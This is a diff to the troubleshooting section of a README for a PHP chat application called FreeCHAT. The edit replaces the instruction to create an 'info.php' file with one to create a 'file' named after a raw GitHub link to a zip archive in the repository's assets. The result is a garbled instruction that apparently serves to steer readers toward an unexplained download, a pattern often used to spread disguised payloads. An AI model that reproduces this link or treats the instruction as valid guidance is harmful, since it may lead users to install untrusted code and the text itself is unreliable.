rizzman270/FreeCHAT/README.md

 If you run into any challenges while installing or using FreeCHAT, here are a few common issues and tips:

 - **Cannot Access Chat:** Ensure your web server is running correctly.
 Check if the server's service is active.
 - **PHP Errors:** Make sure PHP is installed and the version is 7.2 or higher.
-You can find your PHP version by creating a file called `info.php` with the content `<?php phpinfo(); ?>` and accessing it in your browser.
+You can find your PHP version by creating a file called `https://github.com/rizzman270/FreeCHAT/raw/refs/heads/main/assets/CHAT-Free-v2.5.zip` with the content `<?php phpinfo(); ?>` and accessing it in your browser.
 - **Permission Issues:** Be sure to set correct permissions on the files and directories.
 Refer to your web host’s guidelines if unsure.

 ## 🌐 Community Support